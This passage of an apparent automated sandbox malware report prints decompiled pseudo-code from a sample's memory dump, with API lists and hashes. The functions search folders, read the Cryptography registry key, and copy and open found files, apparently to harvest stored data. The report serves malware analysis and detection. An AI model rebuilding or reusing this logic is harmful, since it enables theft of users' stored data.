                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B248
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B266
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressProc$LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 2238633743-0
                                                                      • Opcode ID: 588210b06e7466f33f668d0a8c5683e72e1db78c57bf2da9f1a5b49b6d1e0292
                                                                      • Instruction ID: 364380f0d352aef1bf1129e1f4ec87a81fdd7fa01391a9152c5138518fa9ee90
                                                                      • Opcode Fuzzy Hash: 588210b06e7466f33f668d0a8c5683e72e1db78c57bf2da9f1a5b49b6d1e0292
                                                                      • Instruction Fuzzy Hash: 5761E375A002099BDB01EBE5C985E9EB7BDFF44304F50453AB900FB385DA78EE0587A8
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040989F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 119fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      C-Code - Quality: 51%
                                                                      			E0040989F(char __eax, void* __ebx, intOrPtr* __ecx, char __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				intOrPtr _v117;
				char _v604;
				char _v608;
				char _v612;
				char _v616;
				char _v620;
				char _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v640;
				void* _t58;
				void* _t65;
				int _t68;
				char _t86;
				void* _t91;
				intOrPtr _t105;
				struct _WIN32_FIND_DATAW* _t115;
				intOrPtr* _t117;
				void* _t120;

				_v117 = _v117 + __edx;
				_push(__ebx);
				_v624 = 0;
				_v628 = 0;
				_v640 = 0;
				_v632 = 0;
				_v636 = 0;
				_v612 = 0;
				_v616 = 0;
				_v620 = 0;
				_v608 = 0;
				_t117 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				E004040F4( &_v12);
				_t115 =  &_v604;
				_push(_t120);
				_push(0x409a7e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t120 + 0xfffffd84;
				E00403B80(_t117);
				E00403DB8( &_v608, L"\\*.*", _v8, 0);
				_t58 = FindFirstFileW(E00403D3C(_v608), _t115); // executed
				_t91 = _t58;
				do {
					_push(_v8);
					_push(E00409AA0);
					E00403D10( &_v616, 0x104,  &(_t115->cFileName));
					_push(_v616);
					_push(E00409AA0);
					E0040813C(0x60,  &_v620);
					_push(_v620);
					E00403E1C();
					_t65 = E004076B0(_v612, _t91, 0x104); // executed
					if(_t65 != 0) {
						_push( *_t117);
						_push( &_v624);
						_push(_v8);
						_push(E00409AA0);
						E00403D10( &_v632, 0x104,  &(_t115->cFileName));
						_push(_v632);
						_push(E00409AA0);
						E0040813C(0x60,  &_v636);
						_push(_v636);
						E00403E1C();
						_push(_v628);
						E00403D10( &_v640, 0x104,  &(_t115->cFileName));
						_pop(_t86); // executed
						E004095A4(_t86, _t91, _v12, _v640, _t115, _t117); // executed
						_push(_v624);
						_push(E00409AA8);
						E00403E1C();
					}
					_t68 = FindNextFileW(_t91, _t115); // executed
				} while (_t68 != 0);
				FindClose(_t91); // executed
				_pop(_t105);
				 *[fs:eax] = _t105;
				_push(E00409A85);
				E00403B98( &_v640, 9);
				return E00403B98( &_v12, 2);
			}

























                                                                      0x0040989f
                                                                      0x004098a9
                                                                      0x004098ae
                                                                      0x004098b4
                                                                      0x004098ba
                                                                      0x004098c0
                                                                      0x004098c6
                                                                      0x004098cc
                                                                      0x004098d2
                                                                      0x004098d8
                                                                      0x004098de
                                                                      0x004098e4
                                                                      0x004098e6
                                                                      0x004098e9
                                                                      0x004098ef
                                                                      0x004098f7
                                                                      0x004098fc
                                                                      0x00409904
                                                                      0x00409905
                                                                      0x0040990a
                                                                      0x0040990d
                                                                      0x00409912
                                                                      0x00409926
                                                                      0x0040993e
                                                                      0x00409940
                                                                      0x00409942
                                                                      0x00409942
                                                                      0x00409945
                                                                      0x00409958
                                                                      0x0040995d
                                                                      0x00409963
                                                                      0x00409973
                                                                      0x00409978
                                                                      0x00409989
                                                                      0x00409994
                                                                      0x0040999b
                                                                      0x004099a1
                                                                      0x004099a9
                                                                      0x004099aa
                                                                      0x004099ad
                                                                      0x004099c0
                                                                      0x004099c5
                                                                      0x004099cb
                                                                      0x004099db
                                                                      0x004099e0
                                                                      0x004099f1
                                                                      0x004099fc
                                                                      0x00409a0b
                                                                      0x00409a19
                                                                      0x00409a1a
                                                                      0x00409a1f
                                                                      0x00409a25
                                                                      0x00409a31
                                                                      0x00409a31
                                                                      0x00409a3f
                                                                      0x00409a41
                                                                      0x00409a51
                                                                      0x00409a55
                                                                      0x00409a58
                                                                      0x00409a5b
                                                                      0x00409a6b
                                                                      0x00409a7d

                                                                      APIs
                                                                        • Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102
                                                                        • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                                                                      • FindFirstFileW.KERNEL32(00000000,?,00000000,00409A7E,?,00000000,0041B0FC,00000000,?,00409B10,00000000,0040A39E,?,00000000,00000000), ref: 0040993E
                                                                        • Part of subcall function 004076B0: GetFileAttributesW.KERNEL32(00000000,00000000,004076FC,?,0041C7BC,?,?,004083F8,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781), ref: 004076DE
                                                                      • FindNextFileW.KERNELBASE(00000000,?,?,00409AA0,?,00409AA0,0041A69E,?,00000000,0041B0FC,00000000,?,00409B10,00000000,0040A39E), ref: 00409A3F
                                                                      • FindClose.KERNEL32(00000000,?,00000000,0041B0FC,00000000,?,00409B10,00000000,0040A39E,?,00000000,00000000,?,0040D819,00000000,0040D863), ref: 00409A51
                                                                        • Part of subcall function 004095A4: CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00409890,?,.tmp,?,?,?,00000000,00000000,00000000,?,?,00409A1F), ref: 00409676
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: File$Find$String$AllocAttributesCloseCopyFirstFreeNext
                                                                      • String ID: \*.*
                                                                      • API String ID: 388414203-1173974218
                                                                      • Opcode ID: fc4845d8a7467cfe967d80715bfce9b06f4326a75cfd1ac3618ec102a77ddc32
                                                                      • Instruction ID: 4b84d3bad575dbbbbc4ce0dccbd8eec4ecec2959b06ba8f769e72cfc9add7c19
                                                                      • Opcode Fuzzy Hash: fc4845d8a7467cfe967d80715bfce9b06f4326a75cfd1ac3618ec102a77ddc32
                                                                      • Instruction Fuzzy Hash: F7411E70A04259AFCB10EF65CC85A8DBBB9FF49304F5041FAA508B3292D7795F458F54
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004098A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 119fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      C-Code - Quality: 50%
                                                                      			E004098A0(char __eax, void* __ebx, intOrPtr* __ecx, char __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v604;
				char _v608;
				char _v612;
				char _v616;
				char _v620;
				char _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v640;
				void* _t56;
				void* _t63;
				int _t66;
				char _t84;
				void* _t89;
				intOrPtr _t103;
				struct _WIN32_FIND_DATAW* _t113;
				intOrPtr* _t115;
				void* _t118;

				_push(__ebx);
				_v624 = 0;
				_v628 = 0;
				_v640 = 0;
				_v632 = 0;
				_v636 = 0;
				_v612 = 0;
				_v616 = 0;
				_v620 = 0;
				_v608 = 0;
				_t115 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				E004040F4( &_v12);
				_t113 =  &_v604;
				_push(_t118);
				_push(0x409a7e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t118 + 0xfffffd84;
				E00403B80(_t115);
				E00403DB8( &_v608, L"\\*.*", _v8, 0);
				_t56 = FindFirstFileW(E00403D3C(_v608), _t113); // executed
				_t89 = _t56;
				do {
					_push(_v8);
					_push(E00409AA0);
					E00403D10( &_v616, 0x104,  &(_t113->cFileName));
					_push(_v616);
					_push(E00409AA0);
					E0040813C(0x60,  &_v620);
					_push(_v620);
					E00403E1C();
					_t63 = E004076B0(_v612, _t89, 0x104); // executed
					if(_t63 != 0) {
						_push( *_t115);
						_push( &_v624);
						_push(_v8);
						_push(E00409AA0);
						E00403D10( &_v632, 0x104,  &(_t113->cFileName));
						_push(_v632);
						_push(E00409AA0);
						E0040813C(0x60,  &_v636);
						_push(_v636);
						E00403E1C();
						_push(_v628);
						E00403D10( &_v640, 0x104,  &(_t113->cFileName));
						_pop(_t84); // executed
						E004095A4(_t84, _t89, _v12, _v640, _t113, _t115); // executed
						_push(_v624);
						_push(E00409AA8);
						E00403E1C();
					}
					_t66 = FindNextFileW(_t89, _t113); // executed
				} while (_t66 != 0);
				FindClose(_t89); // executed
				_pop(_t103);
				 *[fs:eax] = _t103;
				_push(E00409A85);
				E00403B98( &_v640, 9);
				return E00403B98( &_v12, 2);
			}
























                                                                      0x004098a9
                                                                      0x004098ae
                                                                      0x004098b4
                                                                      0x004098ba
                                                                      0x004098c0
                                                                      0x004098c6
                                                                      0x004098cc
                                                                      0x004098d2
                                                                      0x004098d8
                                                                      0x004098de
                                                                      0x004098e4
                                                                      0x004098e6
                                                                      0x004098e9
                                                                      0x004098ef
                                                                      0x004098f7
                                                                      0x004098fc
                                                                      0x00409904
                                                                      0x00409905
                                                                      0x0040990a
                                                                      0x0040990d
                                                                      0x00409912
                                                                      0x00409926
                                                                      0x0040993e
                                                                      0x00409940
                                                                      0x00409942
                                                                      0x00409942
                                                                      0x00409945
                                                                      0x00409958
                                                                      0x0040995d
                                                                      0x00409963
                                                                      0x00409973
                                                                      0x00409978
                                                                      0x00409989
                                                                      0x00409994
                                                                      0x0040999b
                                                                      0x004099a1
                                                                      0x004099a9
                                                                      0x004099aa
                                                                      0x004099ad
                                                                      0x004099c0
                                                                      0x004099c5
                                                                      0x004099cb
                                                                      0x004099db
                                                                      0x004099e0
                                                                      0x004099f1
                                                                      0x004099fc
                                                                      0x00409a0b
                                                                      0x00409a19
                                                                      0x00409a1a
                                                                      0x00409a1f
                                                                      0x00409a25
                                                                      0x00409a31
                                                                      0x00409a31
                                                                      0x00409a3f
                                                                      0x00409a41
                                                                      0x00409a51
                                                                      0x00409a55
                                                                      0x00409a58
                                                                      0x00409a5b
                                                                      0x00409a6b
                                                                      0x00409a7d

                                                                      APIs
                                                                        • Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102
                                                                        • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                                                                      • FindFirstFileW.KERNEL32(00000000,?,00000000,00409A7E,?,00000000,0041B0FC,00000000,?,00409B10,00000000,0040A39E,?,00000000,00000000), ref: 0040993E
                                                                        • Part of subcall function 004076B0: GetFileAttributesW.KERNEL32(00000000,00000000,004076FC,?,0041C7BC,?,?,004083F8,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781), ref: 004076DE
                                                                      • FindNextFileW.KERNELBASE(00000000,?,?,00409AA0,?,00409AA0,0041A69E,?,00000000,0041B0FC,00000000,?,00409B10,00000000,0040A39E), ref: 00409A3F
                                                                      • FindClose.KERNEL32(00000000,?,00000000,0041B0FC,00000000,?,00409B10,00000000,0040A39E,?,00000000,00000000,?,0040D819,00000000,0040D863), ref: 00409A51
                                                                        • Part of subcall function 004095A4: CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00409890,?,.tmp,?,?,?,00000000,00000000,00000000,?,?,00409A1F), ref: 00409676
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: File$Find$String$AllocAttributesCloseCopyFirstFreeNext
                                                                      • String ID: \*.*
                                                                      • API String ID: 388414203-1173974218
                                                                      • Opcode ID: e2196b03a9d087d50b6047ea20b559e90859e5d60900ea0ffc21caf91373946a
                                                                      • Instruction ID: 08d55710f553101df7130532bbf42046b2496fa9cfe4254e8507854638314a45
                                                                      • Opcode Fuzzy Hash: e2196b03a9d087d50b6047ea20b559e90859e5d60900ea0ffc21caf91373946a
                                                                      • Instruction Fuzzy Hash: 10410070A04219AFDB10EF65CC85A8EBBB9FF49304F5041FAA508B3292D7799F458F58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00408D3C Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 339fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1314 408d3c-408d48 1315 408d4d-408d52 1314->1315 1315->1315 1316 408d54-408dd2 call 4040f4 call 403980 * 2 call 4047a8 call 403db8 call 403d3c FindFirstFileW 1315->1316 1329 408dd5-408e37 call 403d10 call 40813c call 403e1c call 403d3c GetFileAttributesW 1316->1329 1338 4090e6-4090fc 1329->1338 1339 408e3d-408e99 call 403d10 call 40813c call 403e1c call 408a44 1329->1339 1338->1329 1344 409102-409107 1338->1344 1339->1344 1361 408e9f-408eac call 4045ec 1339->1361 1346 409109-40910d 1344->1346 1347 40913f-409147 1344->1347 1346->1347 1348 40910f-409133 1346->1348 1350 409174-4091dc call 403508 call 403b98 call 4034e4 call 4047b4 call 403508 call 4034e4 call 403b80 call 4034e4 1347->1350 1351 409149-409168 1347->1351 1348->1347 1351->1350 1361->1338 1366 408eb2-408eb3 1361->1366 1369 408eb5-408f04 call 40377c call 403760 call 403798 call 403990 1366->1369 1369->1344 1388 408f0a-408f1a 1369->1388 1388->1344 1390 408f20-408f36 1388->1390 1390->1344 1392 408f3c-408fa3 call 404f00 * 2 call 406984 call 4039e8 call 403790 call 4034e4 1390->1392 1406 408fa5-408fab 1392->1406 1407 408fdd-40904c call 4034e4 call 404f00 * 2 call 406984 call 4039e8 call 403790 call 4034e4 1392->1407 1406->1407 1408 408fad-408fae 1406->1408 1429 409086-4090e0 call 4034e4 call 403760 call 405210 1407->1429 1430 40904e-409054 1407->1430 1410 408fb5-408fdb call 4036cc call 403798 1408->1410 1410->1407 1429->1338 1429->1369 1430->1429 1432 409056-409057 1430->1432 1434 40905e-409084 call 4036cc call 403798 1432->1434 1434->1429
                                                                      C-Code - Quality: 57%
                                                                      			E00408D3C(intOrPtr* __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, char _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				void* _v28;
				char _v29;
				char _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _v60;
				void* _v64;
				char _v68;
				struct _WIN32_FIND_DATAW _v660;
				char _v664;
				intOrPtr _v668;
				char _v672;
				char _v676;
				intOrPtr _v680;
				char _v684;
				char _v688;
				char _v692;
				char _v696;
				intOrPtr _v700;
				intOrPtr _v704;
				char _v708;
				void* _t145;
				long _t155;
				intOrPtr* _t158;
				intOrPtr* _t162;
				intOrPtr* _t181;
				intOrPtr* _t187;
				void* _t205;
				intOrPtr* _t209;
				intOrPtr* _t212;
				intOrPtr* _t216;
				void* _t218;
				intOrPtr* _t235;
				void* _t237;
				intOrPtr* _t256;
				void* _t258;
				intOrPtr* _t270;
				intOrPtr* _t273;
				void* _t286;
				intOrPtr _t288;
				intOrPtr _t314;
				intOrPtr _t317;
				intOrPtr _t319;
				intOrPtr _t320;
				void* _t347;
				void* _t349;
				signed int _t351;
				intOrPtr _t353;
				intOrPtr _t354;
				intOrPtr _t355;
				void* _t356;

				_t350 = __esi;
				_t345 = __edi;
				_t284 = __ebx;
				 *((intOrPtr*)(__eax +  *__eax)) =  *((intOrPtr*)(__eax +  *__eax)) + __eax +  *__eax;
				_t353 = _t354;
				_t288 = 0x57;
				do {
					_push(0);
					_push(0);
					_t288 = _t288 - 1;
				} while (_t288 != 0);
				_push(_t288);
				_t1 =  &_v8;
				 *_t1 = _t288;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 =  *_t1;
				_v8 = __edx;
				E004040F4( &_v8);
				E00403980(_v12);
				E00403980(_a8);
				_push(_t353);
				_push(0x4091dd);
				_push( *[fs:eax]);
				 *[fs:eax] = _t354;
				_push(0);
				E004047A8();
				_t355 = _t354 + 4;
				_v29 = 1;
				E00403DB8( &_v664, L"\\*.*", _v8, 0);
				_t145 = FindFirstFileW(E00403D3C(_v664),  &_v660); // executed
				_v28 = _t145;
				do {
					_push(_v8);
					E00403D10( &_v672, 0x104,  &(_v660.cFileName));
					_push(_v672);
					_push(E00409204);
					E0040813C(0x18,  &_v676);
					_push(_v676);
					E00403E1C();
					_t155 = GetFileAttributesW(E00403D3C(_v668)); // executed
					if(_t155 == 0xffffffff) {
						goto L20;
					} else {
						_push(_v8);
						E00403D10( &_v684, 0x104,  &(_v660.cFileName));
						_push(_v684);
						_push(E00409204);
						E0040813C(0x18,  &_v688);
						_push(_v688);
						E00403E1C();
						E00408A44(_v680, _t284,  &_v36, _t350);
						if(_v29 != 0) {
							_t284 = E004045EC(_v36) - 1;
							if(_t284 < 0) {
								goto L20;
							} else {
								_t286 = _t284 + 1;
								_t351 = 0;
								while(1) {
									E0040377C( &_v692, _v8);
									_push( &_v692);
									E00403760( &_v696, 0x104,  &(_v660.cFileName));
									_pop(_t205);
									E00403798(_t205, _v696);
									_push(E00403990(_v692));
									_t209 =  *0x41b5e0; // 0x41c7a0
									if( *((intOrPtr*)( *_t209))() != 0) {
										goto L21;
									}
									_t212 =  *0x41b5c0; // 0x41c7a4
									_v16 =  *((intOrPtr*)( *_t212))();
									if(_v16 != 0) {
										_t216 =  *0x41b640; // 0x41c7a8
										_t218 =  *((intOrPtr*)( *_t216))(_v16, 1, 0);
										_t355 = _t355 + 0xc;
										if(_t218 == 0) {
											E00404F00();
											E00404F00();
											E00406984( *((intOrPtr*)(_v36 + 4 + (_t351 + _t351 * 2) * 4)), _t286,  &_v44, _t345, _t351);
											_v56 = 0;
											_v52 = E004039E8( &_v44);
											_v48 = E00403790(_v44);
											E004034E4( &_v20);
											_t235 =  *0x41b61c; // 0x41c7ac
											_t237 =  *((intOrPtr*)( *_t235))( &_v56,  &_v68, 0);
											_t356 = _t355 + 0xc;
											if(_t237 == 0) {
												_t345 = _v60 - 1;
												if(_t345 >= 0) {
													_t349 = _t345 + 1;
													_v40 = 0;
													do {
														E004036CC();
														E00403798( &_v20, _v700);
														_v40 = _v40 + 1;
														_t349 = _t349 - 1;
													} while (_t349 != 0);
												}
											}
											E004034E4( &_v44);
											E00404F00();
											E00404F00();
											E00406984( *((intOrPtr*)(_v36 + 8 + (_t351 + _t351 * 2) * 4)), _t286,  &_v44, _t345, _t351);
											_v56 = 0;
											_v52 = E004039E8( &_v44);
											_v48 = E00403790(_v44);
											E004034E4( &_v24);
											_t256 =  *0x41b61c; // 0x41c7ac
											_t258 =  *((intOrPtr*)( *_t256))( &_v56,  &_v68, 0);
											_t355 = _t356 + 0xc;
											if(_t258 == 0) {
												_t345 = _v60 - 1;
												if(_t345 >= 0) {
													_t347 = _t345 + 1;
													_v40 = 0;
													do {
														E004036CC();
														E00403798( &_v24, _v704);
														_v40 = _v40 + 1;
														_t347 = _t347 - 1;
													} while (_t347 != 0);
												}
											}
											E004034E4( &_v44);
											E00403760( &_v708, 0x104,  &(_v660.cFileName));
											E00405210(_a8, _t286,  *((intOrPtr*)(_v36 + (_t351 + _t351 * 2) * 4)), _v12, _t345, _t351, _v708, _v24, _v20);
											_t270 =  *0x41b668; // 0x41c7b4
											 *((intOrPtr*)( *_t270))(_v16);
											_t273 =  *0x41b5d8; // 0x41c7b0
											 *((intOrPtr*)( *_t273))();
											_t351 = _t351 + 1;
											_t286 = _t286 - 1;
											if(_t286 != 0) {
												continue;
											} else {
												goto L20;
											}
										}
									}
									goto L21;
								}
							}
						}
					}
					break;
					L20:
					_push( &_v660);
					_push(_v28);
					_t158 =  *0x41b570; // 0x41c6bc
				} while ( *((intOrPtr*)( *_t158))() != 0);
				L21:
				if( &_v16 != 0 && _v16 != 0) {
					 *[fs:eax] = _t355;
					_t187 =  *0x41b668; // 0x41c7b4
					 *((intOrPtr*)( *_t187))(_v16,  *[fs:eax], 0x409135, _t353);
					_pop(_t320);
					 *[fs:eax] = _t320;
				}
				_t162 =  *0x41b5d8; // 0x41c7b0
				if( *_t162 != 0) {
					 *[fs:eax] = _t355;
					_t181 =  *0x41b5d8; // 0x41c7b0
					 *((intOrPtr*)( *_t181))( *[fs:eax], 0x40916a, _t353);
					_pop(_t319);
					 *[fs:eax] = _t319;
				}
				_pop(_t314);
				 *[fs:eax] = _t314;
				_push(E004091E4);
				E00403508( &_v708, 5);
				E00403B98( &_v688, 7);
				E004034E4( &_v44);
				_t317 =  *0x408a18; // 0x408a1c
				E004047B4( &_v36, _t317);
				E00403508( &_v24, 2);
				E004034E4( &_v12);
				E00403B80( &_v8);
				return E004034E4( &_a8);
			}






























































                                                                      0x00408d3c
                                                                      0x00408d3c
                                                                      0x00408d3c
                                                                      0x00408d3e
                                                                      0x00408d45
                                                                      0x00408d48
                                                                      0x00408d4d
                                                                      0x00408d4d
                                                                      0x00408d4f
                                                                      0x00408d51
                                                                      0x00408d51
                                                                      0x00408d54
                                                                      0x00408d55
                                                                      0x00408d55
                                                                      0x00408d58
                                                                      0x00408d59
                                                                      0x00408d5a
                                                                      0x00408d5b
                                                                      0x00408d5e
                                                                      0x00408d64
                                                                      0x00408d6c
                                                                      0x00408d74
                                                                      0x00408d7b
                                                                      0x00408d7c
                                                                      0x00408d81
                                                                      0x00408d84
                                                                      0x00408d87
                                                                      0x00408d97
                                                                      0x00408d9c
                                                                      0x00408d9f
                                                                      0x00408db8
                                                                      0x00408dd0
                                                                      0x00408dd2
                                                                      0x00408dd5
                                                                      0x00408dd5
                                                                      0x00408de9
                                                                      0x00408dee
                                                                      0x00408df4
                                                                      0x00408e04
                                                                      0x00408e09
                                                                      0x00408e1a
                                                                      0x00408e32
                                                                      0x00408e37
                                                                      0x00000000
                                                                      0x00408e3d
                                                                      0x00408e3d
                                                                      0x00408e51
                                                                      0x00408e56
                                                                      0x00408e5c
                                                                      0x00408e6c
                                                                      0x00408e71
                                                                      0x00408e82
                                                                      0x00408e90
                                                                      0x00408e99
                                                                      0x00408ea9
                                                                      0x00408eac
                                                                      0x00000000
                                                                      0x00408eb2
                                                                      0x00408eb2
                                                                      0x00408eb3
                                                                      0x00408eb5
                                                                      0x00408ebe
                                                                      0x00408ec9
                                                                      0x00408edb
                                                                      0x00408ee6
                                                                      0x00408ee7
                                                                      0x00408ef7
                                                                      0x00408ef8
                                                                      0x00408f04
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00408f0a
                                                                      0x00408f13
                                                                      0x00408f1a
                                                                      0x00408f28
                                                                      0x00408f2f
                                                                      0x00408f31
                                                                      0x00408f36
                                                                      0x00408f44
                                                                      0x00408f51
                                                                      0x00408f63
                                                                      0x00408f6a
                                                                      0x00408f75
                                                                      0x00408f80
                                                                      0x00408f86
                                                                      0x00408f95
                                                                      0x00408f9c
                                                                      0x00408f9e
                                                                      0x00408fa3
                                                                      0x00408fa8
                                                                      0x00408fab
                                                                      0x00408fad
                                                                      0x00408fae
                                                                      0x00408fb5
                                                                      0x00408fc4
                                                                      0x00408fd2
                                                                      0x00408fd7
                                                                      0x00408fda
                                                                      0x00408fda
                                                                      0x00408fb5
                                                                      0x00408fab
                                                                      0x00408fe0
                                                                      0x00408fed
                                                                      0x00408ffa
                                                                      0x0040900c
                                                                      0x00409013
                                                                      0x0040901e
                                                                      0x00409029
                                                                      0x0040902f
                                                                      0x0040903e
                                                                      0x00409045
                                                                      0x00409047
                                                                      0x0040904c
                                                                      0x00409051
                                                                      0x00409054
                                                                      0x00409056
                                                                      0x00409057
                                                                      0x0040905e
                                                                      0x0040906d
                                                                      0x0040907b
                                                                      0x00409080
                                                                      0x00409083
                                                                      0x00409083
                                                                      0x0040905e
                                                                      0x00409054
                                                                      0x00409089
                                                                      0x004090a7
                                                                      0x004090c2
                                                                      0x004090cb
                                                                      0x004090d2
                                                                      0x004090d5
                                                                      0x004090dc
                                                                      0x004090de
                                                                      0x004090df
                                                                      0x004090e0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004090e0
                                                                      0x00408f36
                                                                      0x00000000
                                                                      0x00408f1a
                                                                      0x00408eb5
                                                                      0x00408eac
                                                                      0x00408e99
                                                                      0x00000000
                                                                      0x004090e6
                                                                      0x004090ec
                                                                      0x004090f0
                                                                      0x004090f1
                                                                      0x004090fa
                                                                      0x00409102
                                                                      0x00409107
                                                                      0x0040911a
                                                                      0x00409121
                                                                      0x00409128
                                                                      0x0040912d
                                                                      0x00409130
                                                                      0x00409130
                                                                      0x0040913f
                                                                      0x00409147
                                                                      0x00409154
                                                                      0x00409157
                                                                      0x0040915e
                                                                      0x00409162
                                                                      0x00409165
                                                                      0x00409165
                                                                      0x00409176
                                                                      0x00409179
                                                                      0x0040917c
                                                                      0x0040918c
                                                                      0x0040919c
                                                                      0x004091a4
                                                                      0x004091ac
                                                                      0x004091b2
                                                                      0x004091bf
                                                                      0x004091c7
                                                                      0x004091cf
                                                                      0x004091dc

                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0041A69E), ref: 00408DD0
                                                                      • GetFileAttributesW.KERNEL32(00000000,?,00409204,?,0041A69E,?,?,?,?,?,?,0041A69E), ref: 00408E32
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: File$AttributesFindFirst
                                                                      • String ID: \*.*
                                                                      • API String ID: 4185537391-1173974218
                                                                      • Opcode ID: 7c2d9d634b4927bbe86dd2d784de5aeeaa99b4bb87293a077af95bce882314e1
                                                                      • Instruction ID: 0d373cd88fde81d46e67ec363a4cd78273a777710110dde0edb0dabeac45b8c6
                                                                      • Opcode Fuzzy Hash: 7c2d9d634b4927bbe86dd2d784de5aeeaa99b4bb87293a077af95bce882314e1
                                                                      • Instruction Fuzzy Hash: 4AD12970A00209AFDB10EF95D885ADEB7F9EF49304F1041BAE504F72A1DB39AE45CB59
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00408D44 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 337fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1445 408d44-408d48 1446 408d4d-408d52 1445->1446 1446->1446 1447 408d54-408dd2 call 4040f4 call 403980 * 2 call 4047a8 call 403db8 call 403d3c FindFirstFileW 1446->1447 1460 408dd5-408e37 call 403d10 call 40813c call 403e1c call 403d3c GetFileAttributesW 1447->1460 1469 4090e6-4090fc 1460->1469 1470 408e3d-408e99 call 403d10 call 40813c call 403e1c call 408a44 1460->1470 1469->1460 1475 409102-409107 1469->1475 1470->1475 1492 408e9f-408eac call 4045ec 1470->1492 1477 409109-40910d 1475->1477 1478 40913f-409147 1475->1478 1477->1478 1479 40910f-409133 1477->1479 1481 409174-4091dc call 403508 call 403b98 call 4034e4 call 4047b4 call 403508 call 4034e4 call 403b80 call 4034e4 1478->1481 1482 409149-409168 1478->1482 1479->1478 1482->1481 1492->1469 1497 408eb2-408eb3 1492->1497 1500 408eb5-408f04 call 40377c call 403760 call 403798 call 403990 1497->1500 1500->1475 1519 408f0a-408f1a 1500->1519 1519->1475 1521 408f20-408f36 1519->1521 1521->1475 1523 408f3c-408fa3 call 404f00 * 2 call 406984 call 4039e8 call 403790 call 4034e4 1521->1523 1537 408fa5-408fab 1523->1537 1538 408fdd-40904c call 4034e4 call 404f00 * 2 call 406984 call 4039e8 call 403790 call 4034e4 1523->1538 1537->1538 1539 408fad-408fae 1537->1539 1560 409086-4090e0 call 4034e4 call 403760 call 405210 1538->1560 1561 40904e-409054 1538->1561 1541 408fb5-408fdb call 4036cc call 403798 1539->1541 1541->1538 1560->1469 1560->1500 1561->1560 1563 409056-409057 1561->1563 1565 40905e-409084 call 4036cc call 403798 1563->1565 1565->1560
                                                                      C-Code - Quality: 57%
                                                                      			E00408D44(void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, char _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				void* _v28;
				char _v29;
				char _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _v60;
				void* _v64;
				char _v68;
				struct _WIN32_FIND_DATAW _v660;
				char _v664;
